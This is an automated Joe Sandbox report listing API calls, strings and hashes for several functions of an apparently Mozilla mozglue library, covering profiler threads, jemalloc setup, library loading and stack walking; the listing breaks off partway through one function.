??$AddMarker@UTextMarker@markers@baseprofiler@mozilla@@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@baseprofiler@mozilla@@YA?AVProfileBufferBlockIndex@1@ABV?$ProfilerStringView@D@1@ABVMarkerCategory@1@$$QAVMarkerOptions@1@UTextMarker@markers@01@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.MOZGLUE ref: 6C99F8F9

Part of subcall function 6C966390: GetCurrentThreadId.KERNEL32 ref: 6C9663D0
Part of subcall function 6C966390: AcquireSRWLockExclusive.KERNEL32 ref: 6C9663DF
Part of subcall function 6C966390: ReleaseSRWLockExclusive.KERNEL32 ref: 6C96640E

ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99F93A
GetCurrentThreadId.KERNEL32 ref: 6C99F98A
GetCurrentThreadId.KERNEL32 ref: 6C99F990
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C99F994
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C99F716

Part of subcall function 6C9994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9994EE
Part of subcall function 6C9994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C999508

Part of subcall function 6C95B5A0: memcpy.VCRUNTIME140(?,?,?,?,00000000), ref: 6C95B5E0

GetCurrentThreadId.KERNEL32 ref: 6C99F739
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99F746
GetCurrentThreadId.KERNEL32 ref: 6C99F793
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,6C9D385B,00000002,?,?,?,?,?), ref: 6C99F829
free.MOZGLUE(?,?,00000000,?), ref: 6C99F84C
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?," attempted to re-register as ",0000001F,?,00000000,?), ref: 6C99F866
free.MOZGLUE(?), ref: 6C99FA0C

Part of subcall function 6C965E60: moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9655E1), ref: 6C965E8C
Part of subcall function 6C965E60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C965E9D
Part of subcall function 6C965E60: GetCurrentThreadId.KERNEL32 ref: 6C965EAB
Part of subcall function 6C965E60: GetCurrentThreadId.KERNEL32 ref: 6C965EB8
Part of subcall function 6C965E60: strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C965ECF
Part of subcall function 6C965E60: moz_xmalloc.MOZGLUE(00000024), ref: 6C965F27
Part of subcall function 6C965E60: moz_xmalloc.MOZGLUE(00000004), ref: 6C965F47
Part of subcall function 6C965E60: GetCurrentProcess.KERNEL32 ref: 6C965F53
Part of subcall function 6C965E60: GetCurrentThread.KERNEL32 ref: 6C965F5C
Part of subcall function 6C965E60: GetCurrentProcess.KERNEL32 ref: 6C965F66
Part of subcall function 6C965E60: DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C965F7E

free.MOZGLUE(?), ref: 6C99F9C5
free.MOZGLUE(?), ref: 6C99F9DA

Strings

" attempted to re-register as ", xrefs: 6C99F858
[D %d/%d] profiler_register_thread(%s), xrefs: 6C99F71F
Thread , xrefs: 6C99F789
[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s, xrefs: 6C99F9A6

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Current$Thread$ExclusiveLockfree$getenvmoz_xmallocstrlen$AcquireD@std@@MarkerProcessReleaseTextU?$char_traits@V?$allocator@V?$basic_string@_getpid$BlockBufferCategory@1@$$D@1@D@2@@std@@@D@2@@std@@@baseprofiler@mozilla@@DuplicateHandleIndex@1@Init_thread_footerMarker@Marker@markers@01@Marker@markers@baseprofiler@mozilla@@Now@Options@1@ProfileProfilerStamp@mozilla@@StringTimeV12@_View@__acrt_iob_func__stdio_common_vfprintfmemcpy
String ID: " attempted to re-register as "$Thread $[D %d/%d] profiler_register_thread(%s)$[I %d/%d] profiler_register_thread(%s) - thread %llu already registered as %s
API String ID: 882766088-1834255612
Opcode ID: adb053c41f4b996cf471cd50024806c6380a869b3b6f9227bf40ae8ed8245ea4
Instruction ID: 6b5310c5603d191f7ca0fc8477d7f63638681e90b96a7aec3afb15557e2c5248
Opcode Fuzzy Hash: adb053c41f4b996cf471cd50024806c6380a869b3b6f9227bf40ae8ed8245ea4
Instruction Fuzzy Hash: 8C81D4716047009FDB10DF24C840BAEB7B5FFA5308F59856DE849A7B51EB30E949CBA2

Function 6C99EE40 Relevance: 33.4, APIs: 17, Strings: 2, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
Part of subcall function 6C999420: __Init_thread_footer.LIBCMT ref: 6C99949F

GetCurrentThreadId.KERNEL32 ref: 6C99EE60
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EE6D
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EE92
WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C99EEA5
CloseHandle.KERNEL32(?), ref: 6C99EEB4
free.MOZGLUE(00000000), ref: 6C99EEBB
GetCurrentThreadId.KERNEL32 ref: 6C99EEC7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C99EECF

Part of subcall function 6C99DE60: GetCurrentThreadId.KERNEL32 ref: 6C99DE73
Part of subcall function 6C99DE60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C964A68), ref: 6C99DE7B
Part of subcall function 6C99DE60: ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C964A68), ref: 6C99DEB8
Part of subcall function 6C99DE60: free.MOZGLUE(00000000,?,6C964A68), ref: 6C99DEFE
Part of subcall function 6C99DE60: ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C99DF38

Part of subcall function 6C98CBE8: GetCurrentProcess.KERNEL32(?,6C9531A7), ref: 6C98CBF1
Part of subcall function 6C98CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9531A7), ref: 6C98CBFA

GetCurrentThreadId.KERNEL32 ref: 6C99EF1E
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EF2B
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EF59
GetCurrentThreadId.KERNEL32 ref: 6C99EFB0
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EFBD
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99EFE1
GetCurrentThreadId.KERNEL32 ref: 6C99EFF8
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C99F000

Part of subcall function 6C9994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9994EE
Part of subcall function 6C9994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C999508

?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C99F02F

Part of subcall function 6C99F070: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C99F09B
Part of subcall function 6C99F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C99F0AC
Part of subcall function 6C99F070: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C99F0BE

Strings

[I %d/%d] profiler_stop, xrefs: 6C99EED7
[I %d/%d] profiler_pause, xrefs: 6C99F008

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CurrentThread$ExclusiveLock$Release$AcquireTime_getpidgetenv$ProcessStampV01@@Value@mozilla@@free$?profiler_time@baseprofiler@mozilla@@BufferCloseEnterExit@mozilla@@HandleInit_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@Now@ObjectProfilerRegisterSingleStamp@mozilla@@TerminateV12@_Wait__acrt_iob_func__stdio_common_vfprintf
String ID: [I %d/%d] profiler_pause$[I %d/%d] profiler_stop
API String ID: 16519850-1833026159
Opcode ID: 451629b7ceba5a161d3ef492f19b905726d78a02939a6caee69f6441b36fb32a
Instruction ID: b8a4fbac2efcb96a32d5c2e6a1e40db27ab5d879d583546039f975c505bbd21f
Opcode Fuzzy Hash: 451629b7ceba5a161d3ef492f19b905726d78a02939a6caee69f6441b36fb32a
Instruction Fuzzy Hash: 88510531608A109FDB005BA4D80E7A577B8FB5631EF38465AE919A3F40DB31F884C7E2

Function 6C98D010 Relevance: 31.7, APIs: 13, Strings: 5, Instructions: 215COMMON

Download Yara Rule

APIs

AcquireSRWLockExclusive.KERNEL32(6C9DE804), ref: 6C98D047
GetSystemInfo.KERNEL32(?), ref: 6C98D093
__Init_thread_footer.LIBCMT ref: 6C98D0A6
GetEnvironmentVariableA.KERNEL32(MALLOC_OPTIONS,6C9DE810,00000040), ref: 6C98D0D0
InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DE7B8,00001388), ref: 6C98D147
InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DE744,00001388), ref: 6C98D162
InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DE784,00001388), ref: 6C98D18D
InitializeCriticalSectionAndSpinCount.KERNEL32(6C9DE7DC,00001388), ref: 6C98D1B1

Strings

MOZ_CRASH(), xrefs: 6C98D277
: (malloc) Unsupported character in malloc options: ', xrefs: 6C98D322
Compile-time page size does not divide the runtime one., xrefs: 6C98D26D
MALLOC_OPTIONS, xrefs: 6C98D0CB
<jemalloc>, xrefs: 6C98D268, 6C98D311

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CountCriticalInitializeSectionSpin$AcquireEnvironmentExclusiveInfoInit_thread_footerLockSystemVariable
String ID: : (malloc) Unsupported character in malloc options: '$<jemalloc>$Compile-time page size does not divide the runtime one.$MALLOC_OPTIONS$MOZ_CRASH()
API String ID: 2957312145-326518326
Opcode ID: 616c17d146eabda93402be3f25cd2f4f1caf4e6c323954c565650965d5ccdee2
Instruction ID: bd55a90260161550d85c816f729a0fabb3bfec874916e14820055cbf37d57902
Opcode Fuzzy Hash: 616c17d146eabda93402be3f25cd2f4f1caf4e6c323954c565650965d5ccdee2
Instruction Fuzzy Hash: EE811871B0AA02DBEB04DF68C944B69B7B5FB56B04F20491AE901B7B80D771F880CBD1

Function 6C965E60 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 182threadstringtimeCOMMON

Download Yara Rule

APIs

?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C965E9D

Part of subcall function 6C975B50: QueryPerformanceCounter.KERNEL32(?,?,?,?,6C9756EE,?,00000001), ref: 6C975B85
Part of subcall function 6C975B50: EnterCriticalSection.KERNEL32(6C9DF688,?,?,?,6C9756EE,?,00000001), ref: 6C975B90
Part of subcall function 6C975B50: LeaveCriticalSection.KERNEL32(6C9DF688,?,?,?,6C9756EE,?,00000001), ref: 6C975BD8
Part of subcall function 6C975B50: GetTickCount64.KERNEL32 ref: 6C975BE4

GetCurrentThreadId.KERNEL32 ref: 6C965EAB
GetCurrentThreadId.KERNEL32 ref: 6C965EB8
strlen.API-MS-WIN-CRT-STRING-L1-1-0(GeckoMain,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C965ECF
memcpy.VCRUNTIME140(00000000,GeckoMain,00000000), ref: 6C966017

Part of subcall function 6C954310: moz_xmalloc.MOZGLUE(00000010,?,6C9542D2), ref: 6C95436A
Part of subcall function 6C954310: memcpy.VCRUNTIME140(00000023,?,?,?,?,6C9542D2), ref: 6C954387

moz_xmalloc.MOZGLUE(00000004), ref: 6C965F47
GetCurrentProcess.KERNEL32 ref: 6C965F53
GetCurrentThread.KERNEL32 ref: 6C965F5C
GetCurrentProcess.KERNEL32 ref: 6C965F66
DuplicateHandle.KERNEL32(00000000,?,?,?,0000004A,00000000,00000000), ref: 6C965F7E
moz_xmalloc.MOZGLUE(00000024), ref: 6C965F27

Part of subcall function 6C96CA10: mozalloc_abort.MOZGLUE(?), ref: 6C96CAA2

moz_xmalloc.MOZGLUE(00000040,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9655E1), ref: 6C965E8C

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

moz_xmalloc.MOZGLUE(00000050,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9655E1), ref: 6C96605D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C9655E1), ref: 6C9660CC

Strings

GeckoMain, xrefs: 6C965ECE, 6C966015

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: Currentmoz_xmalloc$Thread$CriticalProcessSectionmemcpy$Count64CounterDuplicateEnterHandleLeaveNow@PerformanceQueryStamp@mozilla@@TickTimeV12@_freemallocmozalloc_abortstrlen
String ID: GeckoMain
API String ID: 3711609982-966795396
Opcode ID: 18007c623affa16d6fd482446bfd0e2da5a0232be5a4f48bdc9a41619676c588
Instruction ID: fe2a2cd9137c1a3b352bfc4f8bd3c8f569d5e34e782df34f2a83b2abc3ece42a
Opcode Fuzzy Hash: 18007c623affa16d6fd482446bfd0e2da5a0232be5a4f48bdc9a41619676c588
Instruction Fuzzy Hash: F871BFB0A09740DFD710DF25C480A6ABBF0BF69308F54496DE48687F92D730E998CB92

Function 6C969590 Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 192libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C9531C0: LoadLibraryW.KERNEL32(KernelBase.dll), ref: 6C953217
Part of subcall function 6C9531C0: GetProcAddress.KERNEL32(00000000,QueryInterruptTime), ref: 6C953236
Part of subcall function 6C9531C0: FreeLibrary.KERNEL32 ref: 6C95324B
Part of subcall function 6C9531C0: __Init_thread_footer.LIBCMT ref: 6C953260
Part of subcall function 6C9531C0: ?ProcessCreation@TimeStamp@mozilla@@SA?AV12@XZ.MOZGLUE(?), ref: 6C95327F
Part of subcall function 6C9531C0: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C95328E
Part of subcall function 6C9531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9532AB
Part of subcall function 6C9531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C9532D1
Part of subcall function 6C9531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?), ref: 6C9532E5
Part of subcall function 6C9531C0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?,?,?), ref: 6C9532F7

LoadLibraryW.KERNEL32(Api-ms-win-core-memory-l1-1-5.dll), ref: 6C969675
__Init_thread_footer.LIBCMT ref: 6C969697
LoadLibraryW.KERNEL32(ntdll.dll), ref: 6C9696E8
GetProcAddress.KERNEL32(00000000,NtMapViewOfSection), ref: 6C969707
__Init_thread_footer.LIBCMT ref: 6C96971F
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C969773
GetProcAddress.KERNEL32(00000000,MapViewOfFileNuma2), ref: 6C9697B7
FreeLibrary.KERNEL32 ref: 6C9697D0
FreeLibrary.KERNEL32 ref: 6C9697EB
SetLastError.KERNEL32(00000000,?,?,00000002,?,?), ref: 6C969824

Strings

NtMapViewOfSection, xrefs: 6C969701
Api-ms-win-core-memory-l1-1-5.dll, xrefs: 6C969670
ntdll.dll, xrefs: 6C9696E3
MapViewOfFileNuma2, xrefs: 6C9697B1

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: LibraryTime$StampV01@@Value@mozilla@@$AddressFreeInit_thread_footerLoadProc$ErrorLastStamp@mozilla@@$Creation@Now@ProcessV12@V12@_
String ID: Api-ms-win-core-memory-l1-1-5.dll$MapViewOfFileNuma2$NtMapViewOfSection$ntdll.dll
API String ID: 3361784254-3880535382
Opcode ID: 0459d1096e69e22618129d6624f471f749d87a7f229ab371141dc1b5634dd1d8
Instruction ID: ad7bde9eeb5b4c124e74dcc735da0b360ff8e9eaf5045ce9313fcdfbf664f9e2
Opcode Fuzzy Hash: 0459d1096e69e22618129d6624f471f749d87a7f229ab371141dc1b5634dd1d8
Instruction Fuzzy Hash: A361E871608B05DBEF00CF65D885BDA7BB5EB4AB18F218519E915A7BC0D730F884CB91

Function 6C967FD0 Relevance: 24.2, APIs: 16, Instructions: 166COMMON

Download Yara Rule

APIs

K32EnumProcessModules.KERNEL32(000000FF,00000000,00000000,?), ref: 6C968007
moz_xmalloc.MOZGLUE(?,000000FF,00000000,00000000,?), ref: 6C96801D

Part of subcall function 6C96CA10: malloc.MOZGLUE(?), ref: 6C96CA26

memset.VCRUNTIME140(00000000,00000000,?,?), ref: 6C96802B
K32EnumProcessModules.KERNEL32(000000FF,00000000,?,?,?,?,?,?), ref: 6C96803D
moz_xmalloc.MOZGLUE(00000104,000000FF,00000000,?,?,?,?,?,?), ref: 6C96808D

Part of subcall function 6C96CA10: mozalloc_abort.MOZGLUE(?), ref: 6C96CAA2

memset.VCRUNTIME140(00000000,00000000,00000104,?,?,?,?,?), ref: 6C96809B
GetModuleFileNameW.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C9680B9
moz_xmalloc.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C9680DF
memset.VCRUNTIME140(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9680ED
wcscpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C9680FB
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C96810D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?), ref: 6C968133
free.MOZGLUE(00000000,000000FF,00000000,?,?,?,?,?,?), ref: 6C968149
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?), ref: 6C968167
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?), ref: 6C96817C
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C968199

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc$EnumModulesProcess$ErrorFileLastModuleNamemallocmozalloc_abortwcscpy_s
String ID:
API String ID: 2721933968-0
Opcode ID: c14b556d18c1698bfe8f38f2806a745741d886637b5ffda01ac28f81f30d86a6
Instruction ID: 65d4232a91dd285b52f2b3a9989be4e44a64ab7fc317eff88c13f0904f252403
Opcode Fuzzy Hash: c14b556d18c1698bfe8f38f2806a745741d886637b5ffda01ac28f81f30d86a6
Instruction Fuzzy Hash: 8A5196B1E001449BEF10DFA6DC849DFB7B9AF69224F250525E815E7781E730D904CBA2

Function 6C9B6660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 162threadCOMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(6C9DF618), ref: 6C9B6694
GetThreadId.KERNEL32(?), ref: 6C9B66B1
GetCurrentThreadId.KERNEL32 ref: 6C9B66B9
memset.VCRUNTIME140(?,00000000,00000100), ref: 6C9B66E1
EnterCriticalSection.KERNEL32(6C9DF618), ref: 6C9B6734
GetCurrentProcess.KERNEL32 ref: 6C9B673A
LeaveCriticalSection.KERNEL32(6C9DF618), ref: 6C9B676C
GetCurrentThread.KERNEL32 ref: 6C9B67FC
memset.VCRUNTIME140(?,00000000,000002C8), ref: 6C9B6868
RtlCaptureContext.NTDLL ref: 6C9B687F

Strings

WalkStack64, xrefs: 6C9B6890

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CriticalCurrentSectionThread$memset$CaptureContextEnterInitializeLeaveProcess
String ID: WalkStack64
API String ID: 2357170935-3499369396
Opcode ID: 34f86f125093d951fe572f2d0265088715f95f22d465a7dddd451c0cb2d06836
Instruction ID: 7c12e1498edf45aa59936eb09e11e5efdcb7c3a4f13503f9025c66312e0df1ec
Opcode Fuzzy Hash: 34f86f125093d951fe572f2d0265088715f95f22d465a7dddd451c0cb2d06836
Instruction Fuzzy Hash: 3451BA71A09701AFDB15CF24C884A5BBBF8BF89714F10892DF999A7640D770F948CB92

Function 6C99DE60 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 135threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C964A68), ref: 6C99945E
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C999470
Part of subcall function 6C999420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C999482
Part of subcall function 6C999420: __Init_thread_footer.LIBCMT ref: 6C99949F

GetCurrentThreadId.KERNEL32 ref: 6C99DE73
GetCurrentThreadId.KERNEL32 ref: 6C99DF7D
AcquireSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99DF8A
ReleaseSRWLockExclusive.KERNEL32(6C9DF4B8), ref: 6C99DFC9
GetCurrentThreadId.KERNEL32 ref: 6C99DFF7
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C99E000
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,6C964A68), ref: 6C99DE7B

Part of subcall function 6C9994D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C9994EE
Part of subcall function 6C9994D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C999508

Part of subcall function 6C98CBE8: GetCurrentProcess.KERNEL32(?,6C9531A7), ref: 6C98CBF1
Part of subcall function 6C98CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C9531A7), ref: 6C98CBFA

?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6C964A68), ref: 6C99DEB8
free.MOZGLUE(00000000,?,6C964A68), ref: 6C99DEFE
?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6C99DF38

Strings

[I %d/%d] locked_profiler_stop, xrefs: 6C99DE83
<none>, xrefs: 6C99DFD7
[I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6C99E00E

Memory Dump Source

Source File: 00000000.00000002.2754669291.000000006C951000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C950000, based on PE: true

Associated: 00000000.00000002.2754555334.000000006C950000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754870260.000000006C9CD000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754942771.000000006C9DE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2754995972.000000006C9E2000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c950000_file.jbxd

Similarity

API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
API String ID: 1281939033-809102171
Opcode ID: f902343b7e8b750820e3b2788a3436ee2b01a62e8fa9e5a762b260bd1e6e05b7
Instruction ID: c88251a2a4174e7d531eee6086474c1a255687f447204ce14e138000e4d58790
Opcode Fuzzy Hash: f902343b7e8b750820e3b2788a3436ee2b01a62e8fa9e5a762b260bd1e6e05b7
Instruction Fuzzy Hash: 9F411632705A119FDB109F64C8497AE7779EB9530DF284019E90AA7F01CB30F855CBE2

Function 6C9AD4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C9AD4F0
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C9AD4FC
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C9AD52A
GetCurrentThreadId.KERNEL32 ref: 6C9AD530
